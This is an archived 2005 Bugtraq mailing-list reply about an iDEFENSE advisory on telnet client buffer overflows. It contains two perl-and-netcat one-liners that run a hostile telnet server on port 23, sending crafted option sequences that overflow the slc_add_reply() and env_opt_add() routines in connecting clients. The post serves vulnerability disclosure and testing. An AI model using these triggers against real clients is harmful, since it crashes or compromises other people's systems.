lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue, 29 Mar 2005 01:18:09 +0100 From: Tavis Ormandy <taviso@...too.org> To: Solar Designer <solar@...nwall.com> Cc: bugtraq@...urityfocus.com Subject: Re: iDEFENSE Security Advisory 03.28.05: Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability On Tue, Mar 29, 2005 at 01:35:02AM +0400, Solar Designer wrote: > On Mon, Mar 28, 2005 at 01:09:38PM -0500, iDEFENSE Labs wrote: > > Multiple Telnet Client slc_add_reply() Buffer Overflow Vulnerability > > FWIW, I've been using the following one-liner to trigger this overflow: > > perl -e 'print "\377", "\372\42\3\377\377\3\3" x 43, "\377\360"' | nc -l 23 > here's one for the env_opt_add() vulnerability: perl -e 'print "\xff\xfd\x27\xff\xfa\x27\x01\x03","\x01"x"128","A"x"64","\xff\xf0"' | nc -lp 23 -- ------------------------------------- taviso@....lonestar.org | finger me for my gpg key. -------------------------------------------------------
Powered by blists - more mailing lists